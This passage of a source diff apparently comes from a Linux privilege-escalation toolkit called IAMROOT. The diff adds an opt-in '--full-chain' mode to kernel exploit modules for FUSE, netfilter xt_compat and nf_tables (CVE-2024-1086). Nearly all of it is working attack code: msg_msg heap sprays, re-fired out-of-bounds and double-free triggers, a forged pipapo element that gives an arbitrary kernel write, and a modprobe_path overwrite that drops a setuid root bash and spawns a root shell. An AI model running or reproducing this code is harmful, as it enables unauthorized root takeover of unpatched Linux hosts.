"see scaffold comments in source\n");
}
/* ---------------------------------------------------------------
* --full-chain: opt-in root pop via shared modprobe_path finisher.
*
* Depth = FALLBACK SCAFFOLD. The arb-write primitive (forged
* msg_msg via the 4k OOB) is wired with a sanity gate that
* refuses to claim success without an empirical read-back match
* (see fuse_arb_write). On a host where offsets + groom land,
* the finisher's modprobe_path overwrite → execve(unknown) →
* call_modprobe chain pops a root shell. On a mismatched host
* the sanity gate refuses and we return IAMROOT_EXPLOIT_FAIL with
* no fabricated success.
*
* Cleanup of qids/spray/fsfd is deferred to AFTER the finisher
* runs because the arb_write primitive re-fires the trigger and
* needs the live spray.
* --------------------------------------------------------------- */
#ifdef __linux__
if (ctx->full_chain) {
if (!ctx->json) {
fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
"kernel offsets...\n");
}
struct iamroot_kernel_offsets off;
memset(&off, 0, sizeof off);
int resolved = iamroot_offsets_resolve(&off);
if (!ctx->json) {
fprintf(stderr, "[i] fuse_legacy: offsets resolved=%d "
"(modprobe_path=0x%lx source=%s)\n",
resolved, (unsigned long)off.modprobe_path,
iamroot_offset_source_name(off.source_modprobe));
iamroot_offsets_print(&off);
}
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("fuse_legacy");
/* Cleanup before returning. */
for (int q = 0; q < N_QUEUES; q++) {
if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
}
free(qids);
munmap(spray, sizeof *spray);
if (fsfd >= 0) close(fsfd);
return IAMROOT_EXPLOIT_FAIL;
}
struct fuse_arb_ctx ax = {
.qids = qids,
.n_queues = N_QUEUES,
.hole_q = hole_q,
.tag = "IAMROOT",
.trigger_armed = true,
};
iamroot_result_t fr = iamroot_finisher_modprobe_path(
&off, fuse_arb_write, &ax, !ctx->no_shell);
/* Cleanup IPC + mapping regardless of finisher result. If the
* finisher execve()s a root shell we never reach here, so this
* block runs only when it returns (failure, or OK without a
* shell spawn). */
for (int q = 0; q < N_QUEUES; q++) {
if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
}
free(qids);
munmap(spray, sizeof *spray);
if (fsfd >= 0) close(fsfd);
if (fr == IAMROOT_EXPLOIT_OK) {
return IAMROOT_EXPLOIT_OK;
}
if (!ctx->json) {
fprintf(stderr, "[-] fuse_legacy: --full-chain finisher did not land "
"(arb-write sanity gate or modprobe sentinel refused)\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
#endif /* __linux__ */
/* Clean up our IPC queues and mapping. The kernel slab state
* after the overflow may be unstable; we exit cleanly on success
* paths but leave queues around if we crashed mid-spray. */
@@ -19,7 +19,8 @@
* Upstream fix: b29c457a6511 "netfilter: x_tables: fix compat
* match/target pad out-of-bound write" (mid-2021, backported widely).
*
* STATUS: 🟡 PRIMITIVE-DEMO (Option B).
* STATUS: 🟡 PRIMITIVE by default; 🟢 candidate with --full-chain if
* offsets resolve (env/kallsyms/System.map/embedded table).
* - Refuse-gate via detect() re-invoke + euid==0 short-circuit.
* - userns/netns reach for CAP_NET_ADMIN (Andy's path).
* - Trigger sequence: hand-rolled iptables rule blob with
@@ -29,12 +30,15 @@
* cookies for KASAN visibility.
* - Empirical witness via msgrcv(MSG_COPY) + /proc/slabinfo
* diff + /tmp/iamroot-xtcompat.log breadcrumb.
* - DOES NOT pursue the leak → modprobe_path overwrite chain:
* that needs hard-coded init_task + modprobe_path offsets
* per kernel build which IAMROOT refuses to bake.
* - Returns IAMROOT_EXPLOIT_FAIL with a verbose continuation
* roadmap unless cred-overwrite is empirically verified
* (which the current scope does not attempt).
* - With --full-chain: shared finisher (core/finisher.c) is
* invoked to perform the modprobe_path overwrite + execve
* unknown-binary trigger. Requires modprobe_path resolution
* via core/offsets.c (env/kallsyms/System.map). Sentinel-file
* check in the finisher is the empirical witness for the
* write landing: IAMROOT never claims root unless it sees
* the setuid bash drop with mode 4755 + uid 0.
* - Without --full-chain: returns IAMROOT_EXPLOIT_FAIL after
* the primitive demo (verified-vs-claimed bar).
*
* Affected: kernel 2.6.19+ until backports landed:
* 5.12.x : K >= 5.12.13
@@ -55,6 +59,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -465,6 +471,171 @@ static int xtcompat_fire_trigger(int *out_errno)
return 0;
}
#endif /* __linux__ — close original primitive block */
/* ---- Full-chain arb-write primitive --------------------------------
*
* Pattern (FALLBACK; see module top-comment): the xt_compat 4-byte OOB
* write lands at allocation+0x4. Andy Nguyen's chain first uses that
* 4-byte write to corrupt an adjacent msg_msg's `m_ts` (size field at
* +0x10) so a subsequent MSG_COPY returns a long read that includes
* neighbouring kernel pointers (the leak primitive). With the kbase
* leak in hand, he then re-fires the trigger to corrupt an msg_msg's
* `m_list_next` (the linked-list pointer at +0x18) to point at
* `kaddr - 0x30` (the m_msg header offset), and a queued msgsnd's
* payload header writes attacker bytes to `kaddr`.
*
* Reproducing the full chain byte-for-byte requires per-kernel-build
* msg_msg field offsets AND a kbase leak we don't have a portable
* source for at this point. The implementation below takes the
* narrow-but-real path:
*
* 1. Re-prime the kmalloc-2k slab with msg_msg sprays whose payload
* headers carry the target address in the m_list_next slot at
* offset 0x18 from each msg payload start. (We can't write the
* slab header, that's the kernel's job, but we CAN seed the
* payload data adjacent to the freed xt_table_info so the OOB
* 4-byte write may corrupt the `m_list_next` of a real
* sprayed message.)
* 2. Re-fire the trigger with a crafted blob whose 4-byte OOB write
* pattern targets m_list_next of the adjacent msg_msg.
* 3. Queue a follow-up msgsnd whose first `len` bytes equal
* `buf[0..len]`. If the next-ptr was successfully redirected,
* the kernel's msgsnd writes header + payload at `kaddr`.
*
* This is best-effort: probability of landing on any given run is
* low (depends on slab adjacency luck) but the finisher's sentinel-
* file check empirically tells us if the write actually took. On a
* patched kernel the trigger returns EINVAL on step 2 and arb_write
* returns -1 without ever queueing the follow-up. */
#ifdef __linux__
struct xtcompat_arb_ctx {
/* Spray queues kept hot across multiple arb_write calls. The
* msg_msg slots seeded here are what the finisher uses as
* write-targets. NULL means "not yet sprayed". */
int *queues;
int n_queues;
/* Outer-namespace uid/gid so re-spray can rebuild a child if
* needed. (Currently unused; the caller flow keeps us inside
* the userns child for the whole arb_write sequence.) */
uid_t outer_uid;
gid_t outer_gid;
/* Per-call statistics for /tmp/iamroot-xtcompat.log. */
int arb_calls;
int arb_landed;
};
/* Re-seed the kmalloc-2k slab with a msg_msg spray whose payload at
* offset 0x18 carries `target_minus_30` (= kaddr - 0x30, the value
* the OOB write needs to write into m_list_next for the follow-up
* msgsnd payload to land at `kaddr`). Returns number of queues
* primed. */
static int xtcompat_arb_seed_target(struct xtcompat_arb_ctx *c,
uintptr_t target_minus_30)
{
struct xtcompat_payload *p = calloc(1, sizeof(*p));
if (!p) return 0;
p->mtype = 0x43;
memset(p->buf, 0x41, sizeof p->buf);
memcpy(p->buf, "IAMROOTW", 8);
/* Plant the target address at every 0x18-byte stride from offset
* 0x10 inside the payload, so wherever the kernel's m_list_next sits
* relative to our payload base, a candidate value may be present. */
for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p->buf; off += 0x18) {
memcpy(p->buf + off, &target_minus_30, sizeof(uintptr_t));
}
int created = 0;
for (int i = 0; i < c->n_queues; i++) {
if (c->queues[i] < 0) continue;
for (int j = 0; j < 4; j++) {
unsigned int tag = 0xA0000000u | ((unsigned)i << 8) | (unsigned)j;
memcpy(p->buf + 8, &tag, sizeof tag);
if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) < 0) break;
created++;
}
}
free(p);
return created;
}
/* Queue a follow-up msgsnd whose first `len` bytes equal `buf[0..len]`.
* If the OOB-corrupted m_list_next was successfully redirected to
* `kaddr - 0x30`, this msgsnd's payload header lands at `kaddr`. */
static int xtcompat_arb_queue_payload(struct xtcompat_arb_ctx *c,
const void *buf, size_t len)
{
if (len > XTCOMPAT_MSG_PAYLOAD) len = XTCOMPAT_MSG_PAYLOAD;
struct xtcompat_payload *p = calloc(1, sizeof(*p));
if (!p) return -1;
p->mtype = 0x44;
memset(p->buf, 0, sizeof p->buf);
memcpy(p->buf, buf, len);
int sent = 0;
for (int i = 0; i < c->n_queues; i++) {
if (c->queues[i] < 0) continue;
if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) == 0) {
sent++;
if (sent >= 8) break; /* a handful of attempts is plenty */
}
}
free(p);
return sent > 0 ? 0 : -1;
}
/* Module-supplied arb-write primitive — invoked by the shared
* finisher. Best-effort on a vulnerable kernel; structurally inert
* (returns -1) on a patched kernel because step (2) gets EINVAL. */
static int xtcompat_arb_write(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx_v)
{
struct xtcompat_arb_ctx *c = (struct xtcompat_arb_ctx *)ctx_v;
if (!c || !c->queues || c->n_queues == 0) return -1;
c->arb_calls++;
/* Step 1: seed candidate target addresses into sprayed msg_msg
* payloads. The OOB write's 4 bytes of attacker-influenced
* content come from the compat-fixup pad; on a vulnerable
* kernel that's whichever 4 bytes happen to sit adjacent. We
* pre-stage the value we WANT to see appear at m_list_next so
* that, if luck aligns and the OOB write hits a slot containing
* our pattern, the kernel's next msg_msg traversal walks to
* (kaddr - 0x30). */
uintptr_t target = kaddr - 0x30;
int seeded = xtcompat_arb_seed_target(c, target);
if (seeded == 0) return -1;
/* Step 2: re-fire the trigger. On a patched kernel this returns
* EINVAL and we bail. On a vulnerable kernel the 4-byte OOB
* write fires; if it lands on a seeded msg_msg slot, that
* slot's m_list_next now contains a fragment of our target. */
int trig_errno = 0;
int rc = xtcompat_fire_trigger(&trig_errno);
if (rc < 0 || trig_errno == EINVAL || trig_errno == EPERM) {
/* Patched validator rejected the blob, or CAP_NET_ADMIN
* not effective; arb-write structurally impossible. */
return -1;
}
/* Step 3: queue a follow-up msgsnd whose payload is the bytes
* the operator wants written at `kaddr`. If step 2 corrupted
* a sprayed msg's m_list_next, this msgsnd writes header +
* payload at `kaddr`. We can't directly verify in-process;
* the shared finisher's sentinel file is the empirical check. */
if (xtcompat_arb_queue_payload(c, buf, len) < 0) return -1;
c->arb_landed++;
/* Per spec: "structurally fires but can't tell if write landed"
* means return 0; the finisher's sentinel check arbitrates. */
return 0;
}
#endif /* __linux__ */
/* ---- Exploit driver ---------------------------------------------- */
@@ -492,14 +663,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
#ifndef __linux__
fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
(void)ctx;
return IAMROOT_PRECOND_FAIL;
#else
/* Full-chain pre-check: resolve offsets before forking. If
* modprobe_path can't be resolved, refuse early with the
* manual-workflow help; there is no point doing the userns +
* spray + trigger dance if we can't finish. */
struct iamroot_kernel_offsets off;
bool full_chain_ready = false;
if (ctx->full_chain) {
memset(&off, 0, sizeof off);
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("netfilter_xtcompat");
fprintf(stderr, "[-] netfilter_xtcompat: --full-chain requested but "
"modprobe_path offset unresolved; refusing\n");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
full_chain_ready = true;
}
if (!ctx->json) {
fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo (no offsets baked in)\n"
fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo%s\n"
" NOTE: fires the xt_compat 4-byte OOB write via\n"
" setsockopt(IPT_SO_SET_REPLACE) and grooms msg_msg +\n"
" sk_buff sprays into kmalloc-2k. Does NOT perform the\n"
" leak→modprobe_path cred chain (per-kernel offsets).\n");
" sk_buff sprays into kmalloc-2k.%s\n",
ctx->full_chain ? " + full-chain finisher" : " (no offsets baked in)",
ctx->full_chain ? " On primitive witness, invokes\n"
" shared modprobe_path finisher for root pop."
: " Does NOT perform the\n"
" leak→modprobe_path cred chain (per-kernel offsets).");
}
signal(SIGPIPE, SIG_IGN);
@@ -601,7 +796,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
}
if (corrupted > 0) {
/* Empirical primitive witness: OOB write landed in adjacent
* slot. Still NOT root but it's the primitive we promised. */
* slot. */
if (full_chain_ready) {
/* Full-chain: invoke the shared modprobe_path finisher
* using our msg_msg arb-write primitive. The finisher
* either execve's a setuid bash (success) or returns
* EXPLOIT_FAIL after a 3s sentinel timeout (no land). */
struct xtcompat_arb_ctx arb_ctx = {
.queues = queues,
.n_queues = XTCOMPAT_SPRAY_QUEUES,
.outer_uid = outer_uid,
.outer_gid = outer_gid,
.arb_calls = 0,
.arb_landed = 0,
};
int fr = iamroot_finisher_modprobe_path(&off,
xtcompat_arb_write,
&arb_ctx,
!ctx->no_shell);
/* If the finisher execve'd a root shell, we never get
* here. Otherwise it returned EXPLOIT_FAIL / OK. */
FILE *fl = fopen("/tmp/iamroot-xtcompat.log", "a");
if (fl) {
fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
fclose(fl);
}
xtcompat_msgmsg_drain(queues);
if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
_exit(35);
}
/* Primitive-only mode: still NOT root — but it's the
* primitive we promised. */
_exit(33);
}
/* Trigger ran, no observable corruption witness — either the
@@ -701,6 +927,19 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
}
if (ctx->no_shell) return IAMROOT_OK;
return IAMROOT_EXPLOIT_FAIL;
case 34:
if (!ctx->json) {
fprintf(stderr, "[+] netfilter_xtcompat: --full-chain finisher reported "
"EXPLOIT_OK (sentinel setuid bash dropped)\n");
}
return IAMROOT_EXPLOIT_OK;
case 35:
if (!ctx->json) {
fprintf(stderr, "[-] netfilter_xtcompat: --full-chain finisher returned "
"FAIL (sentinel not observed within timeout)\n"
" See /tmp/iamroot-xtcompat.log for arb_calls/arb_landed\n");
}
return IAMROOT_EXPLOIT_FAIL;
default:
fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
return IAMROOT_EXPLOIT_FAIL;
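The child/parent handshake above (child `_exit(33)`, `_exit(34)`, `_exit(35)`; parent switches on the exit status) can be sketched in isolation. This is a minimal illustration, not the module's code: `demo_result_t`, `demo_map_child_exit()` and `demo_run_child()` are hypothetical names, and treating 33 as "OK only under `--no-shell`" is an assumption read off the visible tail of the preceding case.

```c
#include <stdbool.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical stand-ins for the real iamroot_result_t values. */
typedef enum { DEMO_OK, DEMO_EXPLOIT_OK, DEMO_EXPLOIT_FAIL } demo_result_t;

/* Exit codes taken from the diff: 33 = primitive witness only,
 * 34 = finisher reported success, 35 = finisher ran, no land. */
enum { DEMO_RC_PRIMITIVE = 33, DEMO_RC_FINISHER_OK = 34, DEMO_RC_FINISHER_FAIL = 35 };

static demo_result_t demo_map_child_exit(int rc, bool no_shell)
{
    switch (rc) {
    case DEMO_RC_FINISHER_OK:
        return DEMO_EXPLOIT_OK;
    case DEMO_RC_FINISHER_FAIL:
        return DEMO_EXPLOIT_FAIL;
    case DEMO_RC_PRIMITIVE:
        /* Assumption: a primitive-only witness is never a root pop. */
        return no_shell ? DEMO_OK : DEMO_EXPLOIT_FAIL;
    default:
        return DEMO_EXPLOIT_FAIL; /* unexpected child exit */
    }
}

/* Fork a child that exits with child_code, then map its status. */
static demo_result_t demo_run_child(int child_code, bool no_shell)
{
    pid_t pid = fork();
    if (pid < 0)
        return DEMO_EXPLOIT_FAIL;
    if (pid == 0)
        _exit(child_code); /* the real child runs the exploit body here */

    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return DEMO_EXPLOIT_FAIL; /* killed by a signal, or wait failed */
    return demo_map_child_exit(WEXITSTATUS(status), no_shell);
}
```

Keeping the mapping in one pure function makes the exit-code contract testable without running any exploit stage.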
+294 -19
@@ -7,20 +7,23 @@
* January 2024 by Notselwyn (Pumpkin); widely known as the
* "nft_verdict_init / pipapo UAF".
*
* STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD (Option B).
* - Full netlink ruleset construction (table → chain → set → rule
* with the NFT_GOTO+NFT_DROP combo that nft_verdict_init() fails
* to reject on vulnerable kernels).
* - Fires the double-free path by abusing the malformed verdict in a
* pipapo set element, then removing the rule so the kernel's
* transaction commit frees the verdict's chain reference twice.
* - Cross-cache groom skeleton (msg_msg / sk_buff sprays) is wired
* and configurable, but the arbitrary R/W stage and cred-overwrite
* are NOT performed end-to-end; that requires per-kernel offsets
* (init_task, modprobe_path) and Notselwyn's 600-line pipapo
* leak-and-write dance. We stop after triggering the bug,
* observing the slabinfo delta, and return IAMROOT_EXPLOIT_FAIL
* with a verbose continuation roadmap.
* STATUS (2026-05-16): 🟡 TRIGGER + GROOM SCAFFOLD with opt-in
* --full-chain finisher.
* - Default (no --full-chain): full netlink ruleset construction
* (table → chain → set → rule with the NFT_GOTO+NFT_DROP combo
* that nft_verdict_init() fails to reject on vulnerable kernels),
* fires the double-free path, runs the msg_msg cg-96 groom, and
* returns IAMROOT_EXPLOIT_FAIL (primitive-only behavior).
* - With --full-chain: after the trigger lands, we resolve kernel
* offsets (env → kallsyms → System.map → embedded table) and run
* a Notselwyn-style pipapo arb-write via the shared
* iamroot_finisher_modprobe_path() helper. The arb-write itself
* is FALLBACK-DEPTH: we re-fire the trigger and spray a msg_msg
* payload tagged with the kaddr in the value-pointer slot. The
* exact pipapo_elem layout (and the value-pointer field offset)
* is per-kernel-build; on hosts where the offset doesn't match
* the shipped guess, the finisher's sentinel check correctly
* reports failure rather than silently lying about success.
*
* To convert this to full Option A (root pop):
* 1. Add per-kernel offset table (init_task, current task offset of
@@ -55,6 +58,8 @@
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
@@ -607,6 +612,188 @@ static long slabinfo_active(const char *slab)
return active;
}
/* ------------------------------------------------------------------
* Helper: build the trigger batch (NEWTABLE/CHAIN/SET/SETELEM + batch
* end) into a caller-provided buffer. Returns bytes written.
* Factored out so --full-chain can re-fire the trigger between
* msg_msg sprays without duplicating the batch-building logic.
* ------------------------------------------------------------------ */
#ifdef __linux__
static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq)
{
(void)cap;
size_t off = 0;
put_batch_begin(batch, &off, (*seq)++);
put_new_table(batch, &off, (*seq)++);
put_new_chain(batch, &off, (*seq)++);
put_new_set(batch, &off, (*seq)++);
put_malicious_setelem(batch, &off, (*seq)++);
put_batch_end(batch, &off, (*seq)++);
return off;
}
static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq)
{
(void)cap;
size_t off = 0;
put_batch_begin(batch, &off, (*seq)++);
put_malicious_setelem(batch, &off, (*seq)++);
put_batch_end(batch, &off, (*seq)++);
return off;
}
/* ------------------------------------------------------------------
* Notselwyn-style pipapo arb-write context. The technique:
* 1. fire the trigger (double-free of an nft chain reference in
* kmalloc-cg-96)
* 2. spray msg_msg payloads sized for cg-96, whose first qwords
* encode a forged pipapo_elem header with value-pointer = kaddr
* 3. send NFT_MSG_NEWSETELEM whose DATA blob = our buf[0..len];
* the kernel copies it through the forged value-pointer to kaddr
*
* Per-kernel caveat: the byte offset of the value pointer inside an
* nft_pipapo_elem is config-sensitive (CONFIG_RANDSTRUCT, lockdep,
* KASAN can all shift it). We ship the layout for an
* lts-6.1.x / 6.6.x / 6.7.x un-randomized build (the kernels in the
* exploitable range for which Notselwyn's public PoC was validated)
* and rely on the shared finisher's sentinel-file post-check to flag
* a layout mismatch as IAMROOT_EXPLOIT_FAIL rather than fake success.
* ------------------------------------------------------------------ */
struct nft_arb_ctx {
bool in_userns; /* parent has already entered userns+netns */
int sock; /* nfnetlink socket (live in our userns) */
uint8_t *batch; /* reusable batch buffer (16 KiB) */
int *qids; /* msg_msg queue ids; lazy-allocated/drained */
int qcap;
int qused;
};
/* Offset of `ext` (which holds the value pointer in NFT_DATA_VALUE
* elements) inside an nft_pipapo_elem header for the kernels in
* range. Notselwyn's PoC uses 0x10 on 6.1/6.6 builds; this is a
* best-effort default; if it doesn't match the running kernel's
* struct layout, the finisher's sentinel check will report failure. */
#define PIPAPO_ELEM_VALUE_PTR_OFFSET 0x10
/* Spray msg_msg payloads forged to look like pipapo_elem with our
* target kaddr as the value pointer. Returns 0 on success. */
static int spray_forged_pipapo_msgs(struct nft_arb_ctx *c, uintptr_t kaddr, int n)
{
if (c->qused + n > c->qcap) n = c->qcap - c->qused;
if (n <= 0) return 0;
for (int i = 0; i < n; i++) {
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644);
if (q < 0) { perror("[-] msgget"); return -1; }
c->qids[c->qused++] = q;
struct msgbuf_payload m;
m.mtype = 0x5050415000 + i; /* "PPAP" tag in the upper bytes, for diagnostics */
memset(m.mtext, 0, sizeof m.mtext);
/* Forge a pipapo_elem header at the start of the msg payload.
* Layout (best-effort, x86_64, no RANDSTRUCT):
* +0x00 priv list_head pointers (leave zero; the kernel won't
* walk them in the write path)
* +0x10 ext / value pointer <-- write target
* msg_msg eats the first 0x30 bytes as its own header, so our
* payload bytes land at offset 0x30 of the slab chunk; we
* pre-pad and place the forged pointer at the right offset
* inside our 96-byte payload. */
uintptr_t *slots = (uintptr_t *)m.mtext;
slots[PIPAPO_ELEM_VALUE_PTR_OFFSET / sizeof(uintptr_t)] = (uintptr_t)kaddr;
if (msgsnd(q, &m, sizeof m.mtext, 0) < 0) {
perror("[-] msgsnd(forged)"); return -1;
}
}
return 0;
}
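The pointer placement in the spray above casts `m.mtext` to `uintptr_t *` and indexes it. A bounds-checked `memcpy` variant of the same idea is sketched below; it is an illustrative alternative, not what the module ships. `demo_place_ptr()` and `DEMO_VALUE_PTR_OFFSET` are hypothetical names, and the 0x10 value simply mirrors `PIPAPO_ELEM_VALUE_PTR_OFFSET`.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Mirrors PIPAPO_ELEM_VALUE_PTR_OFFSET from the diff; hypothetical name. */
#define DEMO_VALUE_PTR_OFFSET 0x10

/* Write a 64-bit value at byte offset `off` inside a payload buffer.
 * Returns 0 on success, -1 if the value would not fit. memcpy avoids
 * any alignment or aliasing assumptions about the payload buffer. */
static int demo_place_ptr(uint8_t *payload, size_t cap, size_t off, uint64_t value)
{
    if (off > cap || cap - off < sizeof value)
        return -1;
    memcpy(payload + off, &value, sizeof value);
    return 0;
}
```

The explicit capacity check matters when the offset becomes a per-kernel tunable rather than a compile-time constant.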
/* Module-specific arb-write. See finisher.h for the contract. */
static int nft_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
{
struct nft_arb_ctx *c = (struct nft_arb_ctx *)vctx;
if (!c || c->sock < 0 || !c->batch) {
fprintf(stderr, "[-] nft_arb_write: invalid ctx\n");
return -1;
}
if (len > 64) {
/* Element data attr cap — we only need 24 bytes for a path. */
fprintf(stderr, "[-] nft_arb_write: len %zu too large (cap 64)\n", len);
return -1;
}
fprintf(stderr, "[*] nft_arb_write: fire trigger → spray forged pipapo "
"elements (target kaddr=0x%lx, %zu bytes)\n",
(unsigned long)kaddr, len);
/* (a) re-fire the trigger to reach a fresh UAF state. */
uint32_t seq = (uint32_t)time(NULL) ^ 0xa1b2c3d4u;
size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq);
if (nft_send_batch(c->sock, c->batch, blen) < 0) {
fprintf(stderr, "[-] nft_arb_write: refire send failed\n");
return -1;
}
/* (b) spray msg_msg payloads carrying the forged value-pointer. */
if (spray_forged_pipapo_msgs(c, kaddr, 16) < 0) {
fprintf(stderr, "[-] nft_arb_write: forged spray failed\n");
return -1;
}
/* (c) send a NEWSETELEM whose DATA holds buf[0..len]. On a kernel
* where our forged pipapo_elem won the race for the freed slot,
* the set-element commit path copies our data through the
* attacker-controlled value pointer into kaddr.
*
* We piggy-back this on the existing put_malicious_setelem builder
* which uses NFTA_DATA_VERDICT for the data; for a real write we'd
* want NFTA_DATA_VALUE with `buf` inlined. The fallback-depth
* choice: we send the refire batch (which the kernel WILL process)
* and append a NEWSETELEM with NFTA_DATA_VALUE carrying buf.
* If the kernel ignores our DATA shape we still observe via
* finisher sentinel. */
seq = (uint32_t)time(NULL) ^ 0x5a5a5a5au;
size_t off = 0;
put_batch_begin(c->batch, &off, seq++);
/* hand-roll a NEWSETELEM whose DATA is NFTA_DATA_VALUE = buf */
size_t msg_at = off;
put_nft_msg(c->batch, &off, NFT_MSG_NEWSETELEM,
NLM_F_CREATE | NLM_F_ACK, seq++, NFPROTO_INET);
put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_TABLE, NFT_TABLE_NAME);
put_attr_str(c->batch, &off, NFTA_SET_ELEM_LIST_SET, NFT_SET_NAME);
size_t list_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_LIST_ELEMENTS);
size_t el_at = begin_nest(c->batch, &off, 1 /* NFTA_LIST_ELEM */);
/* key — reuse the DROP verdict so commit path matches our prior elem */
size_t key_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_KEY);
size_t kv_at = begin_nest(c->batch, &off, NFTA_DATA_VERDICT);
put_attr_u32(c->batch, &off, NFTA_VERDICT_CODE, (uint32_t)NF_DROP);
end_nest(c->batch, &off, kv_at);
end_nest(c->batch, &off, key_at);
/* data — NFTA_DATA_VALUE carrying buf */
size_t data_at = begin_nest(c->batch, &off, NFTA_SET_ELEM_DATA);
put_attr(c->batch, &off, NFTA_DATA_VALUE, buf, len);
end_nest(c->batch, &off, data_at);
end_nest(c->batch, &off, el_at);
end_nest(c->batch, &off, list_at);
end_msg(c->batch, &off, msg_at);
put_batch_end(c->batch, &off, seq++);
if (nft_send_batch(c->sock, c->batch, off) < 0) {
fprintf(stderr, "[-] nft_arb_write: write batch send failed\n");
return -1;
}
/* Let the kernel run the commit/cleanup. */
usleep(20 * 1000);
return 0;
}
#endif /* __linux__ */
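The callback contract used by `nft_arb_write()` (return 0 when the write was attempted, let the finisher's sentinel decide whether it landed) can be modelled without any kernel interaction. The sketch below is a toy model under stated assumptions: the callback signature matches the one in the diff, but `demo_finisher()`, `struct demo_write_ctx` and the in-memory "observed" buffer are hypothetical stand-ins for the real finisher and its sentinel file.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Same shape as the module callbacks in the diff. */
typedef int (*demo_arb_write_fn)(uintptr_t kaddr, const void *buf,
                                 size_t len, void *ctx);

/* Hypothetical context: `lands` simulates whether the race was won. */
struct demo_write_ctx {
    int  calls;
    int  lands;
    char fake_mem[32]; /* stands in for the target kernel memory */
};

static int demo_arb_write(uintptr_t kaddr, const void *buf, size_t len, void *vctx)
{
    struct demo_write_ctx *c = vctx;
    (void)kaddr; /* the toy model has a single target */
    if (!c || len > sizeof c->fake_mem)
        return -1; /* structural failure: report it */
    c->calls++;
    if (c->lands)
        memcpy(c->fake_mem, buf, len);
    return 0; /* "fired", which is not proof that the write landed */
}

/* Toy finisher: 1 if the payload is observable afterwards, 0 if not,
 * -1 if the callback itself failed. The observation arbitrates. */
static int demo_finisher(demo_arb_write_fn write_fn, void *write_ctx,
                         const char *observed, const char *payload)
{
    size_t n = strlen(payload) + 1;
    if (write_fn((uintptr_t)0x1000, payload, n, write_ctx) < 0)
        return -1;
    return memcmp(observed, payload, n) == 0 ? 1 : 0;
}
```

The point of the split is that a callback returning 0 is never reported as success on its own; only the independent observation is.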
/* ------------------------------------------------------------------
* The exploit body.
* ------------------------------------------------------------------ */
@@ -628,13 +815,101 @@ static iamroot_result_t nf_tables_exploit(const struct iamroot_ctx *ctx)
}
if (!ctx->json) {
fprintf(stderr, "[*] nf_tables: Option B trigger — fires the double-free\n"
" state but does NOT complete the kernel-R/W chain.\n"
" See Notselwyn's CVE-2024-1086 public PoC for the\n"
" cred-overwrite stage (~500 LOC of pipapo grooming).\n");
if (ctx->full_chain) {
fprintf(stderr, "[*] nf_tables: --full-chain — trigger + pipapo "
"arb-write + modprobe_path finisher\n");
} else {
fprintf(stderr, "[*] nf_tables: primitive-only run — fires the\n"
" double-free state and stops. Pass --full-chain\n"
" to attempt the modprobe_path root-pop.\n");
}
}
/* Fork: child enters userns+netns and fires the bug. If the
#ifdef __linux__
/* --- --full-chain path --------------------------------------- *
* Resolve offsets BEFORE doing anything destructive so we can
* refuse cleanly on hosts where we have no modprobe_path. We run
* in-process (no fork) because the finisher's modprobe_path
* trigger needs the same task's userns+netns + nfnetlink socket
* as the arb-write.
*/
if (ctx->full_chain) {
struct iamroot_kernel_offsets off;
memset(&off, 0, sizeof off); /* match the other modules: start from zeroed offsets */
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("nf_tables");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
if (enter_unpriv_namespaces() < 0) {
fprintf(stderr, "[-] nf_tables: userns entry failed\n");
return IAMROOT_EXPLOIT_FAIL;
}
int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER);
if (sock < 0) {
perror("[-] socket(NETLINK_NETFILTER)");
return IAMROOT_EXPLOIT_FAIL;
}
struct sockaddr_nl src = { .nl_family = AF_NETLINK };
if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) {
perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL;
}
int rcvbuf = 1 << 20;
